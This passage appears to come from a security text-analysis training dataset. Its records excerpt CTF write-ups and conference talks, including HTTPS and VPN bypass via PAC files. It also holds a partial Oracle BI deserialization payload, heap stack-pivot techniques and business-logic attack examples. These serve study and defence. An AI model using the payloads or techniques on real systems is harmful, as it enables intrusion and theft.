Mitigation Lab Rate Measurement (SNMP) Baselining (Netflow) Protocol Sanity (PCAP) Application (SYSLOG) Protocol Behavior (PCAP) Big Data Analysis Complexity Simple Sophisticated Volume xxx Gbps+ xxx Mbps+ DDoS Mitigation Lab c DDoS Mitigation Lab  Traffic Pattern simulation, e.g. Like traffic behind Proxy  HTTP Header Simulation Simulate Normal traffic Pattern and Behavior!!!!! DDoS Mitigation Lab Conn B and User-agent B Attack Traffic Proxy DDoS Mitigation Lab  HTTP header will change during the attack  For example, first HTTP request for HTTP Header Accept First Request Second Request Accept: */* Accept: image/gif, image/jpeg, imag,.. DDoS Mitigation Lab  TCP option against Detection  Empower attack Power DDoS Mitigation Lab SYN ACK SYN ACK Push ACK (HTTP Request e.g. GET, POST) ACK Push ACK Connection Hold Time Full Control every TCP State!!!! DDoS Mitigation Lab SYN ACK SYN ACK Push ACK (HTTP GET) ACK Fin ACK Conns closed OLD-FASHIONED GET Flood High CPU and constant no. of conns But Still ALIVE!!! DDoS ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Close primes (PPC, 136p, 34 solved) In the challenge we can connect to the server and it provides us with a task. We're supposed to send 512 bit prime `p` such that with the next prime `q` it will have the property that: `sqrt(q) - sqrt(p) >= 0.000000000000000000000000000000000000000000000000000000000000000000000000016` From quick tests we noticed that this difference is larger for smaller primes, so we need to search from the smallest 512 bit primes. It is also, for obvious reasons, larger when the gap between `p` and `q` is large. We didn't do anything fancy here, we simply run a brute force: ```python mp.prec = 1024 p = gmpy2.next_prime(2 ** 511) while True: q = gmpy2.next_prime(p) eps = mpf(\"0.000000000000000000000000000000000000000000000000000000000000000000000000016\") if mp.sqrt(q) - mp.sqrt(p) >= eps: print(q - p, eps - (mp.sqrt(q) - mp.sqrt(p))) print(mp.sqrt(q) - mp.sqrt(p)) print(mp.sqrt(q) - mp.sqrt(p) >= eps) print(p) break p = q ``` And after a short moment we got back `6703903964971298549787012499102923063739682910296196688861780721860882015036773488400937149083451713845015929093243025426876941405973284973216824506199727` Sending this value to the server gives us: `ASIS{C4n_y0U_prOv3__Andrica__Conjecture?}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nToxic Proxies - Bypassing HTTPS & VPNs to pwn your online identity Alex Chapman @noxrnet Paul Stone @pdjstone Introduction Our Talk Exciting introduction Some history  SSL, PAC, WPAD, sslstrip, HSTS The PAC Attack  bypassing HTTPS  Sniffing your traffic  Stealing your data  Stealing your accounts The VPN Attack  bypassing VPNs Mitigations Fixes Rogue Access Point Attacks Techniques in this talk assume an attacker on the local network, e.g.  Open WiFi network  Attacker on a corporate network  Compromised router Can intercept and modify all non encrypted traffic Can carry out local-network attacks on victims First there was no encryption Sure, why not  its 1993! Then there was SSL Problem: No encryption for sensitive websites Solution: Opt-in encryption, certificates to verify domain ownership Netscape 2 ships with SSL in 1995 Users somewhat safe from passive traffic sniffing attacks But SSL wasnt perfect Many Problems:  Most websites allow connecting over HTTP and HTTPS  Most people connect over HTTP first, site redirects to HTTPS  Evil MITM can prevent user reaching HTTPS site sslstrip released in 2009 - https://moxie.org/software/sslstrip/  Man-in-the-middle HTTP proxy  Remove redirects to HTTPS  Rewrite HTTPS links to HTTP  Fetch HTTPS-only pages and serve as HTTP  User never actually reaches the real HTTPS site But SSL wasnt perfect HSTS to the rescue! Problem: sslstrip broke HTTPS by just ignoring it Solution: force browser to always use HTTPS HTTP-Strict-Transport-Security header  2010  Removes vulnerable HTTP -> HTTPS redirect Strict-Transport-Security: max-age=31536000; includeSubDomains Present Day HSTS is doing a pretty good job  Preload lists with most major web sites Nearly all traffic to Google, Facebook, Twitter, etc. is HTTPS  Google.com went HSTS in July 2016 So we need a new style attack Proxy Auto-Config (PAC) Problem: Complex intranets require different HTTP proxies depending on which website you want to visit, e.g.:  proxyA.initech.corp for most i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nunexpand === 将文件的空白字符转换为制表符 ## 补充说明 **unexpand命令** 用于将给定文件中的空白字符space转换为制表符TAB并把转换结果显示在标准输出设备显示终端 ### 语法 ```shell unexpand(选项)(参数) ``` ### 选项 ```shell -a或--all转换文件中所有的空白字符 --first-only仅转换开头的空白字符 -t<N>指定TAB所代表的N个N为整数字符数默认N值是8 ``` ### 参数 文件指定要转换空白为TAB的文件列表", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n环境搭建 安装Oracle19c安装的时候这里要选AL32UTF8 接下来会卡在42%多等一会就好了 安装fmw_12.2.1.3.0_infrastructure.jar 下一步下一步就行 然后安装bi fmw_12.2.1.4.0_bi_windows64_Disk1 下一步下一步就行了 然后运行rcu.bat 创建完bi所用的数据库之后运行C:\\Oracle\\Middleware\\Oracle_Home\\bi\\bin\\config.cmd配置bi 然后就安装完成了 分析 修改C:\\Oracle\\Middleware\\Oracle_Home\\user_projects\\domains\\bi\\bin\\setDomainEnv.cmd 338行 然后重启Oracle BI的服务会在8453端口监听debug 在 C:\\Oracle\\Middleware\\Oracle_Home\\user_projects\\domains\\bi\\servers\\AdminServer\\tmp_WL_use r\\em\\fw8wi5\\war\\WEB-INF\\web.xml中 em对应Oracle BI的http://172.16.16.132:9500/em/ 管理界面 set local_debug=true web.xml中定义了几个映射关系 在org.apache.myfaces.trinidad.webapp.ResourceServlet#doGet中 根据request获取对应的ResourceLoader和resourcePath _getResourceLoader维护了一个ConcurrentMap存放servletPath和loader的映射关系 在oracle.adfinternal.view.resource.rich.RenderKitResourceLoader中向map中注册了对应关系 当路由为/em/afr/foo/remote/payload时会由 RemoteApplicationResourceLoader 作为doGet中的 loader调用其 oracle.adfinternal.view.resource.rich.RemoteApplicationResourceLoader#findResource函数 返回了一个自定义的协议remote和协议处理器RAStreamHandler RAStreamHandler的openConnection返回一个RAURLConnection实例对象在其构造函数中 调用_getPathBean 截取到第一个 / 然后进入 oracle.adfinternal.view.rich.remote.resources.URLEncoderPathBean#getInstanceFromStr ing 不断跟进之后就是readObject 说明我们可以通过/em/afr/foo/remote/{encode payload}/的形式来反序列化 gadget可以用CVE-2020-14644这里放payload 回显执行命令 package com.tangosol.internal.util.invoke.lambda; import com.tangosol.internal.util.invoke.AbstractRemotable; public class LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A extends AbstractRemotable { public LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A() { try { weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread) Thread.currentThread()).getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj); weblogic.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJVM类加载器与双亲委派 学习视频学习视频 类的生命周期 一个类从加载到jvm内存到从jvm内存卸载生命周期可分为七个阶段 1. 加载(Loading)classpathjar包网络磁盘位置下的类的class以二进制字节流读进来在内存 中生成一个代表这个类的Class类对象放入元空间可以自定义类加载器 2. 验证(Verification)验证Class文件的字节流中包含的信息是否符合java虚拟机规范 3. 准备(Preparation)类变量赋默认初始值 4. 解析(Resolution)把符合引用翻译为直接引用 5. 初始化(Initialization) 6. 使用(Using) 7. 卸载(Unloading) 类加载器 什么是类加载器 在类加载阶段通过一个类的全限定名来获取描述该类的二进制字节流的这个动作的代码被称 为类加载器这个动作可以自动有实现 jvm有哪些类加载器 1. 启动类根加载器Bootstrap Classloader使用C++实现是虚拟机自身的一部分 2. 其他类加载器由java语言实现全部继承自抽象类 java.lang.CLassLoader 3. jdk的三层类加载结构 不同类加载器加载哪些文件 1. 启动类加载器<JAVA_HOME>\\jre\\lib\\rt.jar,resources.jar,charsets.jar被-Xbootclasspath参数 所指定的路径中存放的类库 2. 扩展类加载器<JAVA_HOME>\\jre\\lib\\ext被java.ext.dirs系统变量所指定的路径中所有的类库 3. 应用程序类加载器(Application Classloader)系统类加载器加载用户类路径classPath上所 有的类库 注意三层加载器不是类的继承关系 appclassloader 和 extclassloader 继承自 urlclassload 二者之间没有继承关系 package com; public class example { public static void main(String[] args) { example example = new example(); Class<? extends com.example> aClass = example.getClass(); 双亲委派模型 当尝试加载 java.lang.String 类的时候首先是 App ClassLoader 委派给 Ext ClassLoader 然后 Ext ClassLoader 也不加载而是委派给 BootStrap ClassLoader 进行加 载之后 Bootstrap Loader 尝试加载如果加载失败再交还 Ext classLoader 进行加载如果 依然失败再交给 App Classloader  打破双亲委派模型 ClassLoader classLoader = aClass.getClassLoader(); System.out.println(classLoader); //AppClassLoader System.out.println(classLoader.getParent());//ExtClassLoader System.out.println(classLoader.getParent().getParent());//null 1. 不存在 或java程序获取不到根加载器使用CPP系的无法获取 System.out.println(classLoader.getParent().getParent().getParent()); } } ///////////////////////////////////////////////// sun.misc.Launcher$AppClassLoader@18b4aac2 sun.misc.Launcher$ExtClassLoader@4554617c null Exception in thread \"main\" java.lang.NullPointerException at com.example.main(example.java:14) 自定义类加载器重写其中的loadClass方法使其不进行双亲委派 当调用 super.loadClass(var1, var2) 去找父类加载的时候最终找到的是 java.lang.CLassloader 再这个 java.lang.CLassloader#loadClass() 方法中实现了双亲 委派 public Class<?> loadClass(String var1, boolean var2) throws ClassNotFo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Wh3reIsTheD0oR * Category: Forensics * 150 Points * Solved by the JCTF Team ## Description > I know the F1Ag is there, but i can't find the s3cr3t door > > Maybe the PCAP file has a clue on the way to open it... A PCAP file was attached ## Solution Let's check what's happening in the attached PCAP file: ```console (user@kali)-[/media/sf_CTFs/bsides/Wh3reIsTheD0oR] $ tshark -qz io,phs -r w3reisthed0or.pcap =================================================================== Protocol Hierarchy Statistics Filter: eth frames:24918 bytes:22757132 ip frames:24912 bytes:22756826 udp frames:4428 bytes:2981384 dns frames:632 bytes:72397 quic frames:3796 bytes:2908987 quic frames:244 bytes:232438 quic frames:45 bytes:45685 tcp frames:20475 bytes:19774812 http frames:140 bytes:77820 data-text-lines frames:12 bytes:5256 tcp.segments frames:1 bytes:60 json frames:5 bytes:2972 tcp.segments frames:1 bytes:60 ocsp frames:84 bytes:53650 tcp.segments frames:3 bytes:1786 tls frames:5017 bytes:5011356 tcp.segments frames:2570 bytes:3606663 tls frames:2268 bytes:3307584 data frames:287 bytes:15785 _ws.malformed frames:6 bytes:330 icmp frames:9 bytes:630 arp frames:6 bytes:306 =================================================================== ``` We have some HTTP requests, a few are `data-text-lines` and `json` requests and most are `ocsp` requests. Following the different TCP streams, we find the following one: ```console (user@kali)-[/media/sf_CTFs/bsides/Wh3reIsTheD0oR] $ tshark -r ./w3reisthed0or.pcap -qz follow,tcp,ascii,3 =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 3 Node 0: 10.0.3.15:49482 Node 1: 3.126.235.224:80 352 GET / HTTP/1.1 Host: w3reisthed0or.ctf.bsidestlv.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDeconstructing the Circuit Board Sandwich: Effective Techniques for PCB Reverse Engineering Joe Grand (@joegrand) aka Kingpin Grand Idea Studio, Inc. PCB Reverse Engineering  The art of \"undesigning\" an existing system  Destructive and non-destructive methods  Why?  Determine system or subsystem functionality  Security research/verification  Forensic analysis/intelligence  Clone a design  Inject new (malicious) behavior  How?  Access to copper layers  Analyze layout rules/features  Trace component interconnections Deconstruction Techniques  Solder Mask Removal  Delayering  Imaging * Results of my DARPA CFT Research and Analysis of PCB Deconstruction Techniques project PCB Construction & Layer Stack  Layers of thin copper foil (conductive) laminated to insulating (non-conductive) layers  \"Circuit board sandwich\"  Form the physical carrier and electrical pathways for components Spekkoek (not a PCB) PCB cross-section (16 layer) PCB Construction & Layer Stack 2  Silkscreen (Component Legend)  Epoxy or printable ink  Part designators, symbols/logos, manufacturing/test markings  Soldermask  Protects PCB from dust/moisture  Provides access to desired copper areas  Copper  Thickness = weight of copper/sq. ft.  Surface finish provides better solderability  Substrate  Insulating layer  Rigid and/or flex, fiberglass/epoxy weave or specialized composite PCB Construction & Layer Stack 3  Traditional capabilities  3 mil trace/space width  8 mil diameter mechanically-drilled vias  Buried vias  State-of-the art capabilities  < 1 mil trace/space width  0.4 mil diameter laser-drilled microvia  Via-in-pad D. Carey, Going Vertical & Staying Small, www.techinsights.com/uploadedfiles/3d-packaging-trends.pdf PCB Construction & Layer Stack 4  Separate layers only tell part (if any) of the story  Placed together, a complete circuit layout can be identified  If components are also known, a full electrical design can be reversed Emic 2 Text-to-Speech Module Solder Mask Removal  Sandpaper/rubb", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCommon Vulnerabilities on Forget Password Functionality User Enumeration Missing Rate Limiting SQL Injection Cross-Site Scripting Text Injection/Content Spoofing HTML Injection in Email Password Reset Poisoning via Host Header Injection Re-usable Password Reset Token No Expiration on Password Reset Token Guessable Password Reset Token Security Question Bypass during Password Reset Direct Request Referrer Check Bypass Parameter Pollution Reset Token Leakage in Response Password Reset OTP Brute-Force Weak Cryptography in Reset Token Generation Insecure Direct Object Reference IDN Homograph Attack Account Takeovers Third-Party Leakage Weak Password Policy Insufficient Session Expiration on Password Change MFA Auto Disable after Password Reset MindMap By: Harsh Bothra Twitter: @harshbothra_ https://harshbothra.tech", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n统计时间:2021-11-08-2021-11-15 技术节点 [360安全客] Apache httpd Server CVE-2021-41773 漏洞分析 Apache httpd Server 2.4.49 版本引了个具有路径穿越漏洞的新函数但需要配合穿越的录配置 Require all granted攻击者可利该漏洞实现路径穿越从读取任意件或者在配置了cgi的httpd程序 中执bash指令从有机会控制服务器 [360安全客] OMIGODCVE-2021-38647 OMI远程代码执漏洞分析 微软在2021年9的补丁更新中修复了其Open Management Infrastructure (OMI) 中的多个漏洞其中 最为严重个是远程代码执漏洞编号为CVE-2021-38647也被称为OMIGOD该漏洞影响OMI 1.6.8.0 及以下版本 [360安全客] 劫持 Golang 编译 前段时间学习了 0x7F 师傅的dll 劫持和应其中提到通过 dll 劫持来劫持编译器实现供应链攻击不 由想到 Go 中的些机制也可以便地实现编译劫持于是做了些研究和测试 [360安全客] 从零开始开发CS beacon 前段时间出了个beaconEye的项以及golang版本的EvilEye通过扫描内存由于以前为了防被扫描 beacon配置都是改XOR值但是最终内存的都已经被还原出来所以也是能此具被解析出配置 [360安全客] 应急响应篇-windows分析排查技术上 般情况下各种病毒等恶意程序都会在计算机开机启动过程中启动 [360安全客] glibc2.31下通过IOAttack开启ROP 我个更喜欢第种思路, 只需要顺便设置个可读可写地址, 就不费思中转了 [360安全客] OpenStack 远程代码执CVE-2021-40085分析 这篇章将描述我在OpenStack中发现的漏洞基于多种因素的巧妙结合该漏洞可以实现远程代码执 产该漏洞的根本原因很简单但是对其进成功的利需要很作量我将对此进讲述 [360安全客] 深耕保护模式 X86 CPU的3个作模式实模式保护模式和虚拟8086模式 [360安全客] 垂直攀登2021 OSCP AK之旅 先介绍下OSCP报名之前个的基础以供参考 [360安全客] InCTF 2021 国际赛 - kqueue 复现及简要分析 InCTF 国际赛据称为印度的强杯赛时笔者所在的战队没有报名所以未能参加赛后笔者看到了 Scupax0s 师傅的 WP后把其中道kernel pwn简单复现了下感觉还是挺不错的道 kernel pwn  题 [360安全客] 第届华为武汉研究所119络安全赛PWN Writeup 时间2021.10.31地点华为武汉研究所战队天命 [Github关注] ASkyeye forked ASkyeye/NGLite from Maka8ka/NGLite A major platform RAT Tool based by Blockchain/P2P.Now support Windows/Linux/MacOS [Github关注] ASkyeye forked ASkyeye/Rubeus-GUI from VbScrub/Rubeus-GUI Front end for the command line Rubeus tool [Github关注] ASkyeye forked ASkyeye/HEVD-CSharpKernelPwn from daem0nc0re/HEVD- CSharpKernelPwn CSharp Writeups for HackSys Extreme Vulnerable Driver [Github关注] ASkyeye forked ASkyeye/ShellLink from securifybv/ShellLink A .NET Class Library for processing ShellLink (LNK) files [Github关注] S3cur3Th1sSh1t starred diversenok/TokenUniverse /* Under development */ An advanced tool for working with access tokens and Windows security policy. [Github关注] WBGlIl starred UnauthorizedAccessBV/ESET-Protect-Docker-Server [Github关注] jas502n starred rule110-io/surge Surge is a p2p filesharin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nContentsinDetail 1. CoverPage 2. TitlePage 3. CopyrightPage 4. AbouttheAuthors 5. BRIEFCONTENTS 6. CONTENTSINDETAIL 7. FOREWORD 8. ACKNOWLEDGMENTS 9. INTRODUCTION 1. WhoThisBookIsFor 2. WhatThisBookIsnt 3. WhyUseGoforHacking? 4. WhyYouMightNotLoveGo 5. ChapterOverview 10. 1GOFUNDAMENTALS 1. SettingUpaDevelopmentEnvironment 2. UnderstandingGoSyntax 3. Summary 11. 2TCP,SCANNERS,ANDPROXIES 1. UnderstandingtheTCPHandshake 2. BypassingFirewallswithPortForwarding 3. WritingaTCPScanner 4. BuildingaTCPProxy 5. Summary 12. 3HTTPCLIENTSANDREMOTEINTERACTIONWITHTOOLS 1. HTTPFundamentalswithGo 2. BuildinganHTTPClientThatInteractswithShodan 3. InteractingwithMetasploit 4. ParsingDocumentMetadatawithBingScraping 5. Summary 13. 4HTTPSERVERS,ROUTING,ANDMIDDLEWARE 1. HTTPServerBasics 2. CredentialHarvesting 3. KeyloggingwiththeWebSocketAPI 4. MultiplexingCommand-and-Control 5. Summary 14. 5EXPLOITINGDNS 1. WritingDNSClients 2. WritingDNSServers 3. Summary 15. 6INTERACTINGWITHSMBANDNTLM 1. TheSMBPackage 2. UnderstandingSMB 3. GuessingPasswordswithSMB 4. ReusingPasswordswiththePass-the-HashTechnique 5. RecoveringNTLMPasswords 6. Summary 16. 7ABUSINGDATABASESANDFILESYSTEMS 1. SettingUpDatabaseswithDocker 2. ConnectingandQueryingDatabasesinGo 3. BuildingaDatabaseMiner 4. PillagingaFilesystem 5. Summary 17. 8RAWPACKETPROCESSING 1. SettingUpYourEnvironment 2. IdentifyingDevicesbyUsingthepcapSubpackage 3. LiveCapturingandFilteringResults 4. SniffingandDisplayingCleartextUserCredentials 5. PortScanningThroughSYN-floodProtections 6. Summary 18. 9WRITINGANDPORTINGEXPLOITCODE 1. CreatingaFuzzer 2. PortingExploitstoGo 3. CreatingShellcodeinGo 4. Summary 19. 10GOPLUGINSANDEXTENDABLETOOLS 1. UsingGosNativePlug-inSystem 2. BuildingPlug-insinLua 3. Summary 20. 11IMPLEMENTINGANDATTACKINGCRYPTOGRAPHY 1. ReviewingBasicCryptographyConcepts 2. UnderstandingtheStandardCryptoLibrary 3. ExploringHashing 4. AuthenticatingMessages 5. EncryptingData 6. Brute-ForcingRC2 7. Summary 21. 12WINDOWSSYSTEMINTERACTION", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# BTC * Category: Misc. * 150 Points * Solved by the JCTF Team ## Description > Being the only security researcher in the family, you know that every computer related problem will be headed right your way. From giving mom a recommendation before she buys her new laptop, all the way to recovering uncle Joe's pictures from last year's vacation, which have been encrypted by some crappy ransomware. > > But you won't believe what Joe got himself into this time. He accidentally sent a huge amount of Bitcoin to the wrong address! > > With no one to turn to, you're now Joe's only hope to unlock his coins and get them back. Help him write an unlocking script that will allow him to reclaim his coins! ## Solution We visit the attached website and find details of a transaction transferring 161500.99966998 BTC between two entities. The most significant detail on the page is the following sequence which is marked as a \"Pkscript\": ``` 7401248801017901ffa101018801027901ffa101018801037901ffa101018801047901ffa101018801057901ffa101018801067901ffa101018801077901ffa101018801087901ffa101018801097901ffa1010188010a7901ffa1010188010b7901ffa1010188010c7901ffa1010188010d7901ffa1010188010e7901ffa1010188010f7901ffa101018801107901ffa101018801117901ffa101018801127901ffa101018801137901ffa101018801147901ffa101018801157901ffa101018801167901ffa101018801177901ffa101018801187901ffa101018801197901ffa1010188011a7901ffa1010188011b7901ffa1010188011c7901ffa1010188011d7901ffa1010188011e7901ffa1010188011f7901ffa101018801207901ffa101018801217901ffa101018801227901ffa101018801237901ffa101018801247901ffa10101888c017c88a820e29c9c180c6279b0b02abd6a1801c7c04082cf486ec027aa13515e4f3884bb6b88018a8601bb88739301de880102798b01608876769393019688757601cc8763006a6701d58601bb8868aa20bed5fe7c6a43a11e4d7dbe4293f6aa2eeb65025b5f78a518fdd7447ed2ccc55e882627446f6d696e696f6e2720697320616e20696d706f7274616e7420646f63756d656e74617279a7143a4e3aedaf36ced1a17af38a73fbc0cda118220e8701ff6d7601609f93016088a820da4ea2a5506f2693eae190d9360a1f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# C 沙盒逃逸 ## orw 有些时候 pwn 题目中为了增加难度会使用类似 [seccomp](https://en.wikipedia.org/wiki/Seccomp) 的函数来禁用一部分系统调用往往会把 execve 这种系统调用禁用掉基本上拿 shell 是不可能了但是我们 pwn 题是面向 flag 的所以还是可以通过 orw open-read-write 的方法来读出 flag 的在栈上的 orw 和 普通 rop 其实没有什么特别大的区别这里主要谈一谈堆利用中的白名单绕过 一般来说开启了白名单的堆利用类题我们会在劫持了某钩子函数如 __free_hook 或 got 表之后考虑实现 orw这个时候我们只可以注入一个 gadget一般来说我们希望这个 gadget 能够实现栈迁移一种比较通用的做法是利用 setcontext 函数其在 libc-2.29 中实现为 ``` .text:0000000000055E00 ; __unwind { .text:0000000000055E00 push rdi .text:0000000000055E01 lea rsi, [rdi+128h] ; nset .text:0000000000055E08 xor edx, edx ; oset .text:0000000000055E0A mov edi, 2 ; how .text:0000000000055E0F mov r10d, 8 ; sigsetsize .text:0000000000055E15 mov eax, 0Eh .text:0000000000055E1A syscall ; LINUX - sys_rt_sigprocmask .text:0000000000055E1C pop rdx .text:0000000000055E1D cmp rax, 0FFFFFFFFFFFFF001h .text:0000000000055E23 jnb short loc_55E80 .text:0000000000055E25 mov rcx, [rdx+0E0h] .text:0000000000055E2C fldenv byte ptr [rcx] .text:0000000000055E2E ldmxcsr dword ptr [rdx+1C0h] .text:0000000000055E35 mov rsp, [rdx+0A0h] .text:0000000000055E3C mov rbx, [rdx+80h] .text:0000000000055E43 mov rbp, [rdx+78h] .text:0000000000055E47 mov r12, [rdx+48h] .text:0000000000055E4B mov r13, [rdx+50h] .text:0000000000055E4F mov r14, [rdx+58h] .text:0000000000055E53 mov r15, [rdx+60h] .text:0000000000055E57 mov rcx, [rdx+0A8h] .text:0000000000055E5E push rcx .text:0000000000055E5F mov rsi, [rdx+70h] .text:0000000000055E63 mov rdi, [rdx+68h] .text:0000000000055E67 mov rcx, [rdx+98h] .text:0000000000055E6E mov r8, [rdx+28h] .text:0000000000055E72 mov r9, [rdx+30h] .text:0000000000055E76 mov rdx, [rdx+88h] .text:0000000000055E76 ; } // starts at 55E00 ``` 当然其他版本也大同小异可见在这个函数中有对 rsp 的赋值如果我们可以控制 rdx就可以控制 rsp 实现栈迁移了 ### 例题 #### Balsn_CTF_2019-PlainText ##### 分析 在 orw 之前的利用这里不再赘述请见Glibc Heap 利用目录下的堆中的 Off-By-One中对此题的分析 比较讨厌的是在 libc-2.29 下free 函数不会再将 rdi 赋值给 rdx我们无法直接控制 rdx仅能控制 rdi幸好比较巧合的在本题的 libc 中有这样一个 gadget ``` 0x12be97: mov rdx, qword ptr [rdi + 8]; mov rax, qword ptr [", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport re import threading from time import sleep import math import requests lower_bound = 0 bound_lock = threading.Lock() def seed_collector(): global bound_lock global lower_bound while True: url = \"http://pailler.quals.seccon.jp/cgi-bin/pq.cgi\" data = str(requests.get(url).content) c, o, h = map(int, re.findall(\"\\d+\", data)) potential_n = int(math.sqrt(max([c, o, h]))) bound_lock.acquire() if potential_n > lower_bound: lower_bound = potential_n print(\"new lower bound \" + str(lower_bound)) bound_lock.release() print(c, o, h) sleep(3) def bruter(): global lower_bound global bound_lock bound = 1 while True: bound_lock.acquire() current = max([bound, lower_bound]) lower_bound = current if valid_n(lower_bound): print(\"n=\" + str(lower_bound)) return else: lower_bound += 1 bound_lock.release() def valid_n(n): return ((4329821979223433093 * 5091080979048341208) % (n * n) == 2181673299914317485) def main(): threading.Thread(target=seed_collector, args=[]).start() threading.Thread(target=bruter, args=[]).start() # main() def egcd(a, b): u, u1 = 1, 0 v, v1 = 0, 1 while b: q = a // b u, u1 = u1, u - q * u1 v, v1 = v1, v - q * v1 a, b = b, a - q * b return a, u, v def modinv(n, e): _gcd, d, _2 = egcd(e, n) if d < 0: d += n return d def L(u, n): return int((u - 1) / n) def breaker(): p, q = 42727, 58757 n = 2510510339 lbd = 1255204428 # lcm(p-1, q-1) g = n + 1 x = L(pow(g, lbd, n * n), n) mi = int(modinv(n, x)) c = 2662407698910651121 # przykladowy ciphertext m = L(pow(c, lbd, n * n), n) * pow(mi, 1, n) print(m % n) breaker() #1510490612 #SECCON{SECCoooo_oooOooo_ooooooooN}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n陆柏廷 | BT 漏洞盒子 高级安全研究员 漏洞盒子简介 漏洞盒子 互联网安全服 务平台 FreeBuf 互联网安全新 媒体 网藤风险感知 基于SaaS模式的自 动化企业安全风险 感知服务平台 自有安全团队与外部 安全专家结合共同 为厂商提供安全一体 化解决方案 安全专家 相关机构 厂商  厂商金融保险电商互联网通信等  相关机构CNCERTCNNVD SERCIS SHCERT公安部第三研究所中国民航测评中心 天津网安等 演讲提纲 前 言 场 景 方 法 企业安全测试进化史 １.０ ２.０ ３.０ 基于功能 性能的安 全测试 基于漏洞类 型的安全测 试 基于业务场 景的安全测 试 何为业务场景 其他场景 支付场景  实名认证场景 购物及订单场景 活动场景 身份认证场景 一个业务系统包含的交互场景 业务逻辑漏洞是怎样的存在  Bypass一切防护设备  至今还没有一款有效的全自动化工具  再资深的程序员都可能造坑  即使安全人员开发的程序也可能有坑 开发人员ＶＳ安全人员 身份盗取 交易篡改 权限跨越 资源消耗 一个对外业务可能面临哪些业务风险 身份盗取迷失的穿云箭 digiSign 身份盗取简单认证 身份盗取最后一公里 权限跨越垂直水平 Cookie: SESSION=USER-334dsf9ref8esg8erg390g Cookie: SESSION=USER-3dfg34768jh4h234g5h5jk Cookie: SESSION=USER-304jkh6g9090ertk45g0s9 Cookie: SESSION=USER-2dfg34768jh4h234g5h5jk Cookie: SESSION=USER-1dfg34768jh4h234g5h5jk 客户端 服务端 操作userId的资源 返回执行结果 Cookie: SESSION=USER-334dsf9ref8esg8erg390g userId=519235 用户检查 session=34dsf9ref8esg8erg390g 权限检测 level=3 level=1admin level=2vip user level=3normal user 权限跨越垂直水平 权限跨越签名突破 客户端 服务端 预查询联系人ID 返回联系人ID 查询联系人ID详情 返回联系人详情 SIGNED SIGNED 篡改此处ID 权限跨越签名突破 交易篡改签名破解 将订单中的v_amount,v_moneytype,v_oid,v_mid,v_url参数的value值拼成一个无间隔的 字符串,使用key作为salt即生成任意伪造数据签名 交易篡改局部验证 资源消耗变量覆盖 GET /sms/sendVerifySms/?phoneNumber=18666666666&prefix=R&type=phoneNumber HTTP/1.1 GET /sms/sendVerifySms/?phoneNumber=18666666666&phoneNumber=18666666666&prefix=R&type=phone Number HTTP/1.1 GET /sms/sendVerifySms/?phoneNumber=18666666666&phoneNumber=variable&prefix=R&type=phoneNumber HTTP/1.1 资源消耗并发请求 客户端 服务端 获取优惠券 返回执行结果 是否已获取该优惠券 返回执行结果 数据库 资源消耗并发请求 资源消耗薅羊毛  花8000万做推广3000万被羊毛党薅走  需要什么给什么只要收益大于付出 防治  提高门槛用户流失  后期检测成本高误差大 如何高效测试  业务场景建模  业务流程梳理  风险点识别 业务场景建模１ 不同行业业务场景有所异同 如银行金融保险证券电商020游戏社交招聘航空 白盒开发文档 黑盒主动识别 业务场景建模-1电商 红包/优惠 券相关 个人信息 相关 业务接口 调用 实名认证 身份认证 支付相关 订单相关 绑定银行卡 电商业务 场景建模 业务场景建模-1P2P金融 借款/贷款 个人信息 相关 活动相关 绑定银行卡 实名认证 身份认证 支付相关 交易信息 P2P金融业务 场景建模 业务场景建模-1游戏 游戏角色 相关 个人信息 相关 业务接口 调用 活动抽奖 相关 社交相关 身份认证 游戏点卡 充值 实名身份证 登记 游戏业务 场景建模 业务场景建模-1银行 借款/贷款 个人信息 相关 转账/取款 U盾相关 客户端相关 身份认证 支付相关 交易信息 银行业务 场景建模 业务场景建模-2  相同行业即使是相同业务系统业务场景也不是一成不变的  高风险业务场景识别  需求沟通 业务场景建模", "category": "text_analysis", "source": "security_papers"}
